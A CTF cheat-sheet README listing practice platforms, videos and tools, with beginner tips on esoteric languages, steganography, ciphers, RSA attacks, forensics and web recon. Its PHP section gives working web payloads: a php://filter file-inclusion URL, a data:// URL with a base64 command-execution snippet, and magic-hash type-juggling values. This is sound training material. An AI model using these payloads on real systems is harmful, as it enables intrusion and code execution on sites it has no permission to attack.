├── README.md
├── pastel1.png
└── thankks.png


/README.md:
--------------------------------------------------------------------------------
   1 | # CTF-CheatSheet
   2 | 
   3 | # CTF
   4 | **[CTFTime](https://ctftime.org)**<br>
   5 | **[OverTheWire](https://overthewire.org/wargames)**<br>
   6 | **[PicoCTF](https://play.picoctf.org)**<br>
   7 | **[ImaginaryCTF](https://imaginaryctf.org)**<br>
   8 | **[247CTF](https://247ctf.com)**<br>
   9 | **[CTF Challenge](https://ctfchallenge.com)**<br>
  10 | **[CTF Learn](https://ctflearn.com)**<br>
  11 | **[CryptoHack](https://cryptohack.org)**<br>
  12 | **[HackThisSite](https://www.hackthissite.org)**<br>
  13 | **[SmashTheStack](http://smashthestack.org/wargames.html)**<br>
  14 | **[W3Challs](https://w3challs.com/challenges)**<br>
  15 | **[Ringzer0CTF](https://ringzer0ctf.com/challenges)**<br>
  16 | **[Enigma Group](https://www.enigmagroup.org)**<br>
  17 | **[Root Me](https://www.root-me.org)**
  18 | 
  19 | # Pentesting
  20 | **[HackTheBox](https://app.hackthebox.eu)**<br>
  21 | **[TryHackMe](https://tryhackme.com)**<br>
  22 | **[OffSec Proving Grounds](https://www.offensive-security.com/labs)**<br>
  23 | **[Web Security Academy](https://portswigger.net/web-security)**<br>
  24 | **[Damn Vulnerable Web Application](https://github.com/digininja/DVWA)**<br>
  25 | **[OWASP Juice Shop](https://github.com/juice-shop/juice-shop-ctf)**<br>
  26 | **[Hacker 101](https://ctf.hacker101.com)**<br>
  27 | **[PentesterLab](https://pentesterlab.com)**<br>
  28 | **[VulnHub](https://www.vulnhub.com)**<br>
  29 | **[VulnMachines](https://www.vulnmachines.com)**<br>
  30 | **[HackingLab](https://www.hacking-lab.com/index.html)**<br>
  31 | **[CyberSecLabs](https://www.cyberseclabs.co.uk)**<br>
  32 | **[HackXOR](https://hackxor.net)**<br>
  33 | **[Hacktoria](https://hacktoria.com)**
  34 | 
  35 | # Pwn / RE
  36 | **[Pwn.College](https://pwn.college)**<br>
  37 | **[ROP Emporium](https://ropemporium.com)**<br>
  38 | **[Exploit Education](https://exploit.education)**<br>
  39 | **[How2Heap](https://github.com/shellphish/how2heap)**<br>
  40 | **[Pwnables](https://pwnable.tw/challenge)**<br>
  41 | **[Deusx64](https://deusx64.ai)**<br>
  42 | **[Roppers Academy](https://roppers.org/collections)**<br>
  43 | **[Azeria Labs](https://azeria-labs.com/writing-arm-assembly-part-1)**<br>
  44 | **[Reversing Challenges](https://challenges.re)**<br>
  45 | **[Begin RE](https://www.begin.re)**<br>
  46 | **[CrackMes](https://crackmes.one)**
  47 | 
  48 | # Blue Team
  49 | **[LetsDefend](https://letsdefend.io)**<br>
  50 | **[Blue Team Labs Online](https://blueteamlabs.online)**<br>
  51 | **[Cyber Defenders](https://cyberdefenders.org)**<br>
  52 | **[Attack Defense](https://attackdefense.com)**<br>
  53 | **[Immersive Labs](https://dca.immersivelabs.online)**
  54 | 
  55 | # Videos
  56 | **[LiveOverflow](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)**<br>
  57 | **[John Hammond](https://www.youtube.com/c/JohnHammond010)**<br>
  58 | **[IppSec](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA)**<br>
  59 | **[XCT](https://www.youtube.com/channel/UClGm2C8Qi0_Wv68zfjCz2YA)**<br>
  60 | **[Gynvael](https://www.youtube.com/user/GynvaelEN)**<br>
  61 | **[ZetaTwo](https://www.youtube.com/c/ZetaTwo)**<br>
  62 | **[PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A)**<br>
  63 | **[0xdf](https://www.youtube.com/channel/UChO9OAH57Flz35RRX__E25A)**<br>
  64 | **[247CTF](https://www.youtube.com/channel/UCtGLeKomT06x3xZ2SZp2l9Q)**<br>
  65 | **[MalFind](https://www.youtube.com/channel/UCJf4-reOhoiAlScWC1WzLgQ)**<br>
  66 | **[DayZeroSec](https://www.youtube.com/c/dayzerosec)**<br>
  67 | **[Rana Khalil](https://www.youtube.com/c/RanaKhalil101)**<br>
  68 | **[PinkDraconian](https://www.youtube.com/channel/UCmXwpkCXmIKjoRLMsq9I3RA)**<br>
  69 | **[Superhero1](https://www.youtube.com/channel/UCm2SwKmx3Ya1HG5RmHR7SCA)**<br>
  70 | **[S1lk](https://www.youtube.com/c/AlexChaveriat)**<br>
  71 | **[Alh4zr3d](https://www.youtube.com/channel/UCz-Z-d2VPQXHGkch0-_KovA)**<br>
  72 | **[Paweł Łukasik](https://www.youtube.com/c/PawelLukasik)**<br>
  73 | **[Ephemeral](https://www.youtube.com/c/BasteG0d69)**<br>
  74 | **[Hak5](https://www.youtube.com/c/hak5)**<br>
  75 | **[Conda](https://www.youtube.com/c/c0nd4)**<br>
  76 | **[HackerSploit](https://www.youtube.com/c/HackerSploit)**<br>
  77 | **[Condingo](https://www.youtube.com/c/codingo)**<br>
  78 | **[InsiderPhd](https://www.youtube.com/c/InsiderPhD)**<br>
  79 | **[HackSplained](https://www.youtube.com/c/Hacksplained)**<br>
  80 | **[TheCyberMentor](https://www.youtube.com/c/TheCyberMentor)**<br>
  81 | **[StackSmashing](https://www.youtube.com/c/stacksmashing)**<br>
  82 | **[Cybersecurity Meg](https://www.youtube.com/c/CybersecurityMeg)**<br>
  83 | **[Tib3rius](https://www.youtube.com/c/Tib3rius)**<br>
  84 | **[SecAura](https://www.youtube.com/channel/UCx89Lz24SEPZpExl6OfQ0Gg)**<br>
  85 | **[DarkSec](https://www.youtube.com/c/DarkSec)**<br>
  86 | **[Hexorcist](https://www.youtube.com/c/HEXORCIST)**<br>
  87 | **[PwnCollege](https://www.youtube.com/c/pwncollege)**<br>
  88 | **[NahamSec](https://www.youtube.com/c/Nahamsec)**<br>
  89 | **[Optional](https://www.youtube.com/c/optionalctf)**<br>
  90 | **[TheHackerish](https://www.youtube.com/c/thehackerish)**<br>
  91 | **[Ryan Gordon](https://www.youtube.com/c/0xRy4n)**<br>
  92 | **[AlmondForce](https://www.youtube.com/c/AlmondForce)**<br>
  93 | **[VulnMachines](https://www.youtube.com/c/vulnmachines)**<br>
  94 | **[Others](https://securitycreators.video)**
  95 | 
  96 | # Tools
  97 | **[Ghidra](https://ghidra.re/CheatSheet.html)**<br>
  98 | **[Volatility](https://github.com/volatilityfoundation/volatility/wiki/Linux)**<br>
  99 | **[PwnTools](https://github.com/Gallopsled/pwntools-tutorial)**<br>
 100 | **[CyberChef](https://gchq.github.io/CyberChef)**<br>
 101 | **[DCode](https://www.dcode.fr/en)**<br>
 102 | **[Decompile Code](https://www.decompiler.com)**<br>
 103 | **[Run Code](https://tio.run)**<br>
 104 | **[GTFOBins](https://gtfobins.github.io)**<br>
 105 | **[ExploitDB](https://www.exploit-db.com)**<br>
 106 | **[RevShells](https://revshells.com)**
 107 | 
 108 | # More Resources
 109 | **[Bug Bounty Platforms](https://github.com/disclose/bug-bounty-platforms)**<br>
 110 | **[HackTricks](https://book.hacktricks.xyz/pentesting-methodology)**<br>
 111 | **[CTF Resources](https://github.com/apsdehal/awesome-ctf)**<br>
 112 | **[Security Resources](https://github.com/CompassSecurity/security_resources)**<br>
 113 | **[Bug Bounty Resources](https://www.hacker101.com/resources)**<br>
 114 | **[Seal9055 Resources](https://github.com/seal9055/resources)**<br>
 115 | **[Forensics](https://cugu.github.io/awesome-forensics)**<br>
 116 | **[Learn RE](https://hshrzd.wordpress.com/how-to-start)**<br>
 117 | **[Learn BinExp](https://guyinatuxedo.github.io)**<br>
 118 | **[HTB Writeups](https://0xdf.gitlab.io)**
 119 | 
 120 | 
 121 | ![CTF](https://i.ytimg.com/vi/8ev9ZX9J45A/maxresdefault.jpg)
 122 | 
 123 | 
 124 | Welcome to the world of CTFs 🏴‍☠️
 125 | 
 126 | --------------------------
 127 | 
 128 | This is an introduction to some of the basics of each category. It was designed to help beginners and old comrades, enjoy the ride and "Pwn Every CTF".
 129 | 
 130 | 
 131 | Esoteric Languages
 132 | -----------------------
 133 | 
 134 | * [https://tio.run/](https://tio.run/)
 135 | 
 136 | 	An online tool that has a ton of Esoteric language interpreters. 
 137 | 
 138 | * Brainfuck
 139 | 
 140 | 	This language is easily detectable by its huge use of plus signs, braces, and arrows. 	There are plenty of online interpreters, like this one: [https://copy.sh/brainfuck/](https://copy.sh/brainfuck/) Some example code:
 141 | 
 142 | ```
 143 | ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.--.--------------.+++++++++++++.----.-----------
 144 | --.++++++++++++.--------.<------------.<++.>>----.+.<+++++++++++.+++++++++++++.>+++++++++++++++++.-------------
 145 | --.++++.+++++++++++++++.<<.>>-------.<+++++++++++++++.>+++..++++.--------.+++.<+++.<++++++++++++++++++++++++++
 146 | .<++++++++++++++++++++++.>++++++++++++++..>+.----.>------.+++++++.--------.<+++.>++++++++++++..-------.++.
 147 | ```
 148 | 
 149 | * [Malboge]
 150 | 
 151 | 	An esoteric language that looks a lot like Base85... but isn't. Often has references to "Inferno" or "Hell" or "Dante." Online interpreters like so: [http://www.malbolge.doleczek.pl/](http://www.malbolge.doleczek.pl/) Example code:
 152 | 
 153 | ```
 154 | (=<`#9]~6ZY32Vx/4Rs+0No-&Jk)"Fh}|Bcy?`=*z]Kw%oG4UUS0/@-ejc(:'8dc
 155 | ```
 156 | 
 157 | * [Piet]
 158 | 
 159 | 	A graphical programming language... looks like large 8-bit pixels in a variety of colors. Can be interpreted with the tool [`npiet`][npiet]
 160 | 
 161 | ![https://www.bertnase.de/npiet/hi.png](https://www.bertnase.de/npiet/hi.png)
 162 | 
 163 | 
 164 | * [Ook!](http://esolangs.org/wiki/ook!)
 165 | 
 166 | 	A joke language. Recognizable by `.` and `?`, and `!`.
 167 | 	
 168 | * Hexahue Cipher
 169 | 
 170 | ![](https://miro.medium.com/max/465/1*QY8sg087QQwXOoS3Cu1cWg.jpeg)
 171 | 
 172 | 
 173 | https://www.dcode.fr/hexahue-cipher
 174 | ```
 175 | Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
 176 | Ook. Ook. Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
 177 | Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook? Ook! Ook! Ook? Ook! Ook? Ook.
 178 | Ook! Ook. Ook. Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook.
 179 | Ook. Ook. Ook! Ook? Ook? Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook. Ook?
 180 | Ook! Ook! Ook? Ook! Ook? Ook. Ook. Ook. Ook! Ook. Ook. Ook. Ook. Ook. Ook. Ook.
 181 | ```
 182 | 
 183 | Steganography
 184 | ---------------------
 185 | 
 186 | * [StegCracker][StegCracker]
 187 | 
 188 | 	Don't ever forget about [`steghide`][steghide]! This tool can use a password list like `rockyou.txt` with steghide. SOME IMAGES CAN HAVE MULTIPLE FILED ENCODED WITH MULTIPLE PASSWORDS.
 189 | 
 190 | * [`steg_brute.py`](https://github.com/Va5c0/Steghide-Brute-Force-Tool)
 191 | 
 192 | 	This is similar to `stegcracker` above.
 193 | 
 194 | * [`openstego`][OpenStego]
 195 | 
 196 | 	A [Java][Java] [`.JAR`][JAR] tool, that can extract data from an image. A good tool to use on guessing challenges, when you don't have any other leads. We found this tool after the [Misc50](http://0xahmed.ninja/nullcon-hackim18-ctf-writeups/) challenge from [HackIM 2018](https://ctftime.org/event/566)
 197 | 
 198 | * [`Stegsolve.jar`][Stegsolve.jar]
 199 | 
 200 | 	A [Java][Java] [`.JAR`][JAR] tool, that will open an image and let you as the user arrow through different renditions of the image (viewing color channels, inverted colors, and more). The tool is surprisingly useful.
 201 | 
 202 | * [`steghide`][steghide]
 203 | 
 204 | 	A command-line tool typically used alongside a password or key, that could be uncovered some other way when solving a challenge. 
 205 | 
 206 | * [`zsteg`][zsteg]
 207 | 
 208 | 	Command-line tool for use against Least Significant Bit steganography... unfortunately only works against PNG and BMP images.
 209 | 
 210 | * [`jsteg`][jsteg]
 211 | 
 212 |     Another command-line tool to use against JPEG images. [https://github.com/lukechampine/jsteg](https://github.com/lukechampine/jsteg) Handy for Hackerrank Codefest CTF 2018.
 213 | 
 214 | * [Jstego][Jstego]
 215 | 
 216 |     A GUI tool for JPG steganography. [https://sourceforge.net/projects/jstego/](https://sourceforge.net/projects/jstego/) It is a [Java][Java] [JAR] file similar to stegsolve.jar
 217 | 
 218 | * Morse Code
 219 | 
 220 | 	Always test for this if you are seeing two distinct values... _it may not always be binary!_ Online decoders like so: [https://morsecode.scphillips.com/translator.html](https://morsecode.scphillips.com/translator.html) 	
 221 | 
 222 | * Whitespace
 223 | 
 224 | 	Tabs and spaces could be representing 1's and 0's and treating them as a binary message... or, they could be whitespace done with [`snow`][snow] or an esoteric programming language interpreter: [https://tio.run/#whitespace](https://tio.run/#whitespace)
 225 | 
 226 | * DNA Codes
 227 | 
 228 |     When given a sequence with only A, C, G, T , there is an online mapping for these. Try this:
 229 | 
 230 |     ![img/dna_codes.png](img/dna_codes.png)
 231 |     ![img/genome_coding.jpg](img/genome-coding.jpg)
 232 | 
 233 | * [`snow`][snow]
 234 | 
 235 | 	A command-line tool for whitespace steganography (see above).
 236 | 
 237 | * SONIC Visualizer (audio spectrum)
 238 | 
 239 | 	Some classic challenges use an audio file to hide a flag or other sensitive stuff. SONIC visualizer easily shows you [spectrogram](https://en.wikipedia.org/wiki/Spectrogram). __If it sounds like there is random bleeps and bloops in the sound, try this tactic!__
 240 | 
 241 | * [Detect DTMF Tones]
 242 | 
 243 | 	Audio frequencies common to a phone button, DTMF: [https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling](https://en.wikipedia.org/wiki/Dual-tone_multi-frequency_signaling).
 244 | 
 245 | * Phone-Keypad
 246 | 
 247 | 	Some messages may be hidden with a string of numbers, but really be encoded with old cell-phone keypads, like text messaging with numbers repeated:
 248 | 
 249 | ![https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov](https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQSySxHjMFv80XWp74LZpfrnAro6a1MLqeF1F3zpguA5PGSW9ov)
 250 | 
 251 | * [`hipshot`][hipshot]
 252 | 
 253 | 	A [Python] module to compress a video into a single standalone image, simulating a long-exposure photograph. Was used to steal a [QR code] visible in a video, displayed through "Star Wars" style text motion.	
 254 | 
 255 | * [QR code]
 256 | 
 257 | 	A small square "barcode" image that holds data.
 258 | 
 259 | * [`zbarimg`][zbarimg]
 260 | 
 261 | 	A command-line tool to quickly scan multiple forms of barcodes, [QR codes] included. Installed like so on a typical [Ubuntu] image: 
 262 | 
 263 | ```
 264 | sudo apt install zbar-tools
 265 | ```
 266 | 	
 267 | * Punctuation marks `!`, `.` and `?`
 268 | 
 269 | 	I have seen some challenges use just the end of `.` or `?` or `!` to represent the [Ook](http://esolangs.org/wiki/ook!) esoteric programming language. Don't forget that is a thing!
 270 | 
 271 | Cryptography
 272 | -----------------
 273 | 
 274 | 
 275 | * Keyboard Shift
 276 | 	
 277 | 	[https://www.dcode.fr/keyboard-shift-cipher](https://www.dcode.fr/keyboard-shift-cipher) If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...
 278 | 
 279 | * Bit Shift
 280 | 
 281 | 	Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ).
 282 | 
 283 | * Reversed Text
 284 | 
 285 | 	Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in [Python] like so:
 286 | 
 287 | ```
 288 | "UOYMORFEDIHOTGNIYRTEBTHGIMFTCATAHTTERCESASISIHT"[::-1]
 289 | ```
 290 | 
 291 | * XOR
 292 | 
 293 | 	ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in `\xde\xad\xbe\xef` etc..) Note that you can do easy XOR locally with Python like so (you need `pwntools` installed):
 294 | 
 295 | 	``` python
 296 | 	python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")
 297 | 	```
 298 | 
 299 | 
 300 | * Caesar Cipher
 301 | 
 302 | 	The most classic shift cipher. Tons of online tools like this: [https://www.dcode.fr/caesar-cipher](https://www.dcode.fr/caesar-cipher) or use `caesar` as a command-line tool (`sudo apt install bsdgames`) and you can supply a key for it. Here's a one liner to try all letter positions:
 303 | 
 304 | 	```
 305 | 	cipher='jeoi{geiwev_gmtliv_ws_svmkmrep}' ; for i in {0..25}; do echo $cipher | caesar $i; done
 306 | 	```
 307 | 
 308 | 	__Be aware!__ Some challenges include punctuation in their shift! If this is the case, try to a shift within all 255 ASCII characters, not just 26 alphabetical letters!
 309 | 
 310 | * `caesar`
 311 | 
 312 | 	A command-line caesar cipher tool (noted above) found in the `bsdgames` package.
 313 | 
 314 | * [Atbash Cipher]
 315 | 
 316 | 	If you have some text that you have no idea what it is, try the [Atbash cipher]! It's a letter mapping, but the alphabet is reversed: like `A` maps to `Z`, `B` maps to `Y` and so on. There are tons of online tools to do this ([http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)), and you can build it with [Python].
 317 | 
 318 | * [Vigenere Cipher]
 319 | 
 320 | 	[http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](http://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx), [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) and personal Python code here: [https://pastebin.com/2Vr29g6J](https://pastebin.com/2Vr29g6J)
 321 | 
 322 | * Beaufourt Cipher
 323 | 
 324 | 	[https://www.dcode.fr/beaufort-cipher](https://www.dcode.fr/beaufort-cipher)
 325 | 
 326 | 
 327 | * Python random module cracker/predictor
 328 | 
 329 | 	[https://github.com/tna0y/Python-random-module-cracker](https://github.com/tna0y/Python-random-module-cracker)... helps attack the Mersenne Twister used in Python's random module. 
 330 | 
 331 | * Transposition Cipher
 332 | 
 333 | * RSA: Classic RSA
 334 | 
 335 | 	Variables typically given: `n`, `c`, `e`. _ALWAYS_ try and give to [http://factordb.com](http://factordb.com). If `p` and `q` are able to be determined, use some RSA decryptor; handmade code available here: [https://pastebin.com/ERAMhJ1v](https://pastebin.com/ERAMhJ1v)
 336 | 
 337 | * RSA: Multi-prime RSA
 338 | 
 339 | * RSA: `e` is 3 (or small)
 340 | 
 341 | 	If `e` is 3, you can try the cubed-root attack. If you the cubed root of `c`, and if that is smaller than the cubed root of `n`, then your plaintext message `m` is just the cubed root of `c`! Here is [Python] code to take the cubed root:
 342 | 
 343 | ```
 344 | def root3rd(x):
 345 |     y, y1 = None, 2
 346 |     while y!=y1:
 347 |         y = y1
 348 |         y3 = y**3
 349 |         d = (2*y3+x)
 350 |         y1 = (y*(y3+2*x)+d//2)//d
 351 |     return y 
 352 | ``` 
 353 | 
 354 | * RSA: Weiner's Little D Attack
 355 | 
 356 | 	The telltale sign for this kind of challenge is an enormously large `e` value. Typically `e` is either 65537 (0x10001) or `3` (like for a Chinese Remainder Theorem challenge). Some stolen code available here: [https://pastebin.com/VKjYsDqD](https://pastebin.com/VKjYsDqD)
 357 | 
 358 | * RSA: Chinese Remainder Attack
 359 | 
 360 | 	These challenges can be spotted when given  mutiple `c` cipher texts and multiple `n` moduli. `e` must be the same number of given `c` and `n` pairs. Some handmade code here: [https://pastebin.com/qypwc6wH](https://pastebin.com/qypwc6wH)
 361 | 
 362 | * [LC4]
 363 | 
 364 | 	This is an adaptation of RC4... just not. There is an implementation available in Python.
 365 | 	[https://github.com/dstein64/LC4/blob/master/documentation.md](https://github.com/dstein64/LC4/blob/master/documentation.md)
 366 | 
 367 | * Elgamal
 368 | 
 369 | * Affine Cipher
 370 | 
 371 | * Substitution Cipher (use quip quip!)
 372 | 
 373 | 	[https://quipqiup.com/](https://quipqiup.com/)
 374 | 
 375 | * Railfence Cipher
 376 | 
 377 | 	[http://rumkin.com/tools/cipher/railfence.php](http://rumkin.com/tools/cipher/railfence.php)
 378 | 
 379 | 
 380 | * [Playfair Cipher]
 381 | 
 382 | 	racker: [http://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html](http://bionsgadgets.appspot.com/ww_forms/playfair_ph_web_worker3.html)
 383 | 
 384 | * Polybius Square
 385 | 
 386 | 	[https://www.braingle.com/brainteasers/codes/polybius.php](https://www.braingle.com/brainteasers/codes/polybius.php)
 387 | 
 388 | * The Engima
 389 | 
 390 | 	[http://enigma.louisedade.co.uk/enigma.html](http://enigma.louisedade.co.uk/enigma.html),
 391 | 	[https://www.dcode.fr/enigma-machine-cipher](https://www.dcode.fr/enigma-machine-cipher)
 392 | 
 393 | * AES ECB
 394 | 
 395 | 	The "blind SQL" of cryptography... leak the flag out by testing for characters just one byte away from the block length. 
 396 | 
 397 | 
 398 | * Two-Time Pad
 399 | 
 400 | 	
 401 | 
 402 | Networking
 403 | ---------------
 404 | 
 405 | * [Wireshark]
 406 | 
 407 | 	The go-to tool for examining [`.pcap`][PCAP] files. 
 408 | 
 409 | * [Network Miner]
 410 | 
 411 | 	Seriously cool tool that will try and scrape out images, files, credentials and other goods from [PCAP] and [PCAPNG] files.
 412 | 
 413 | * [PCAPNG]
 414 | 
 415 | 	Not all tools like the [PCAPNG] file format... so you can convert them with an online tool [http://pcapng.com/](http://pcapng.com/) or from the command-line with the `editcap` command that comes with installing [Wireshark]:
 416 | 
 417 | ```
 418 | editcap old_file.pcapng new_file.pcap
 419 | ```
 420 | 
 421 | * [`tcpflow`][tcpflow]
 422 | 
 423 | 	A command-line tool for reorganizing packets in a PCAP file and getting files out of them. __Typically it gives no output, but it creates the files in your current directory!__ 
 424 | 
 425 | ```
 426 | tcpflow -r my_file.pcap
 427 | ls -1t | head -5 # see the last 5 recently modified files
 428 | ```
 429 | 
 430 | 
 431 | 
 432 | * [PcapXray]
 433 | 
 434 | 	A GUI tool to visualize network traffic.
 435 | 
 436 | PHP
 437 | ------------
 438 | 
 439 | * Magic Hashes
 440 | 
 441 | 	A common vulnerability in [PHP] that fakes hash "collisions..." where the `==` operator falls short in [PHP] type comparison, thinking everything that follows `0e` is considered scientific notation (and therefore 0). More valuable info can be found here: [https://github.com/spaze/hashes](https://github.com/spaze/hashes), but below are the most common breaks.
 442 | 
 443 | | Plaintext | MD5 Hash |
 444 | | --------- | -------- |
 445 | |240610708|0e462097431906509019562988736854|
 446 | |QLTHNDT|0e405967825401955372549139051580|
 447 | |QNKCDZO|0e830400451993494058024219903391|
 448 | |PJNPDWY|0e291529052894702774557631701704|
 449 | |NWWKITQ|0e763082070976038347657360817689|
 450 | |NOOPCJF|0e818888003657176127862245791911|
 451 | |MMHUWUV|0e701732711630150438129209816536|
 452 | |MAUXXQC|0e478478466848439040434801845361|
 453 | |IHKFRNS|0e256160682445802696926137988570|
 454 | |GZECLQZ|0e537612333747236407713628225676|
 455 | |GGHMVOE|0e362766013028313274586933780773|
 456 | |GEGHBXL|0e248776895502908863709684713578|
 457 | |EEIZDOI|0e782601363539291779881938479162|
 458 | |DYAXWCA|0e424759758842488633464374063001|
 459 | |DQWRASX|0e742373665639232907775599582643|
 460 | |BRTKUJZ|00e57640477961333848717747276704|
 461 | |ABJIHVY|0e755264355178451322893275696586|
 462 | |aaaXXAYW|0e540853622400160407992788832284|
 463 | |aabg7XSs|0e087386482136013740957780965295|
 464 | |aabC9RqS|0e041022518165728065344349536299|
 465 | 
 466 | | Plaintext | SHA1 Hash |
 467 | | --------- | --------- |
 468 | |aaroZmOk|0e66507019969427134894567494305185566735|
 469 | |aaK1STfY|0e76658526655756207688271159624026011393|
 470 | |aaO8zKZF|0e89257456677279068558073954252716165668|
 471 | |aa3OFF9m|0e36977786278517984959260394024281014729|
 472 | 
 473 | 
 474 | * `preg_replace`
 475 | 
 476 | 	A bug in older versions of [PHP] where the user could get remote code execution
 477 | 	
 478 | 	[http://php.net/manual/en/function.preg-replace.php](http://php.net/manual/en/function.preg-replace.php)
 479 | 
 480 | 
 481 | * [`phpdc.phpr`][phpdc.phpr]
 482 | 
 483 | 	A command-line tool to decode [`bcompiler`][bcompiler] compiled [PHP] code.
 484 | 
 485 | 
 486 | * [`php://filter` for Local File Inclusion](https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/)
 487 | 
 488 | 	A bug in [PHP] where if GET HTTP variables in the URL are controlling the navigation of the web page, perhaps the source code is `include`-ing other files to be served to the user. This can be manipulated by using [PHP filters](http://php.net/manual/en/filters.php) to potentially retrieve source code. Example like so:
 489 | 
 490 | ```
 491 | http://xqi.cc/index.php?m=php://filter/convert.base64-encode/resource=index
 492 | ```
 493 | 
 494 | 
 495 | * `data://text/plain;base64`
 496 | 
 497 | 	A [PHP] stream that can be taken advantage of if used and evaluated as an `include` resource or evaluated. Can be used for RCE: check out this writeup: [https://ctftime.org/writeup/8868](https://ctftime.org/writeup/8868) ... TL;DR:
 498 | 
 499 | ```
 500 | http://103.5.112.91:1234/?cmd=whoami&page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=
 501 | ``` 
 502 | 
 503 | 
 504 | PDF Files
 505 | -------------
 506 | 
 507 | * `pdfinfo`	
 508 | 	
 509 | 	A command-line tool to get a basic synopsis of what the [PDF] file is.
 510 | 
 511 | * `pdfcrack`
 512 | 
 513 | 	A comand-line tool to __recover a password from a PDF file.__ Supports dictionary wordlists and bruteforce.
 514 | 
 515 | * `pdfimages`
 516 | 
 517 | 	A command-line tool, the first thing to reach for when given a PDF file. It extracts the images stored in a PDF file, but it needs the name of an output directory (that it will create for) to place the found images.
 518 | 
 519 | * [`pdfdetach`][pdfdetach]
 520 | 
 521 | 	A command-line tool to extract files out of a [PDF].
 522 | 
 523 | 
 524 | Forensics
 525 | -----------
 526 | 
 527 | 
 528 | * [Magic Numbers]
 529 | 
 530 | 	The starting values that identify a file format. These are often crucial for programs to properly read a certain file type, so they must be correct. If some files are acting strangely, try verifying their [magic number] with a [trusted list of file signatures](https://en.wikipedia.org/wiki/List_of_file_signatures).
 531 | 
 532 | * [`hexed.it`][hexed.it]
 533 | 
 534 | 	An online tool that allows you to modify the hexadecimal and binary values of an uploaded file. This is a good tool for correcting files with a corrupt [magic number]
 535 | 
 536 | * [`dumpzilla`][dumpzilla]
 537 | 
 538 | 	A [Python] script to examine a `.mozilla` configuration file, to examine downloads, bookmarks, history or bookmarks and registered passwords. Usage may be as such:
 539 | 
 540 | ```
 541 | python dumpzilla.py .mozilla/firefox/c3a958fk.default/ --Downloads --History --Bookmarks --Passwords
 542 | ```
 543 | 
 544 | 
 545 | * Repair image online tool
 546 | 
 547 |     Good low-hanging fruit to throw any image at: [https://online.officerecovery.com/pixrecovery/](https://online.officerecovery.com/pixrecovery/)
 548 | 
 549 | 
 550 | * `foremost`
 551 | 
 552 | 	A command-line tool to carve files out of another file. Usage is `foremost [filename]` and it will create an `output` directory.
 553 | 
 554 | ```
 555 | sudo apt install foremost
 556 | ```
 557 | 
 558 | * `binwalk`
 559 | 
 560 | 	A command-line tool to carve files out of another file. Usage to extract is `binwalk -e [filename]` and it will create a `_[filename]_extracted` directory.
 561 | 
 562 | ```
 563 | 	sudo apt install binwalk
 564 | ```
 565 | 
 566 | 
 567 | * [`hachoir-subfile`][hachoir-subfile]
 568 | 
 569 | 	A command-line tool to carve out files of another file. Very similar to the other tools like `binwalk` and `foremost`, but always try everything!
 570 | 
 571 | 
 572 | * [TestDisk]
 573 | 
 574 | 	A command-line tool, used to recover deleted files from a file system image. Handy to use if given a `.dd` and `.img` file etc.
 575 | 
 576 | 
 577 | PNG File Forensics
 578 | --------------------
 579 | 
 580 | 
 581 | * `pngcheck`
 582 | 
 583 | 	A command-line tool for "checking" a [PNG] image file. Especially good for verifying checksums.
 584 | 
 585 | 
 586 | APK Forensics
 587 | ---------------
 588 | 
 589 | * [`apktool`][apktool]
 590 | 
 591 | 	A command-line tool to extract all the resources from an APK file. Usage:
 592 | 
 593 | ```
 594 | apktool d <file.apk>
 595 | ```
 596 | 
 597 | 
 598 | * [`dex2jar`][dex2jar]
 599 | 
 600 | 	A command-line tool to convert a J.dex file to .class file and zip them as JAR files.
 601 | 
 602 | 
 603 | * [`jd-gui`][jd-gui]
 604 | 
 605 | 	A GUI tool to decompile Java code, and JAR files.
 606 | 	
 607 | 
 608 | Web
 609 | ----------------
 610 | 
 611 | * `robots.txt`
 612 | 
 613 | 	This file tries to hide webpages from web crawlers, like Google or Bing or Yahoo. A lot of sites try and use this mask sensitive files or folders, so it should always be some where you check during a CTF. [http://www.robotstxt.org/](http://www.robotstxt.org/)
 614 | 
 615 | * [Edit This Cookie]
 616 | 
 617 | 	A web browser plug-in that offers an easy interface to modifying [cookies]. ___THIS IS OFTEN OVERLOOKED, WITHOUT CHANGING THE VALUE OF THE COOKIES... BE SURE TO FUZZ EVERYTHING, INCLUDING COOKIE VALUES!___
 618 | 
 619 | * Backup pages ( `~` and `.bak` and `.swp` )
 620 | 
 621 | 	Some times you may be able to dig up an old version of a webpage (or some PHP source code!) by adding the usual backup suffixes. A good thing to check!
 622 | 
 623 | * `/admin/`
 624 | 
 625 | 	This directory is often found by directory scanning bruteforce tools, so I recommend just checking the directory on your own, as part of your own "low-hanging fruits" check.
 626 | 
 627 | * `/.git/`
 628 | 	
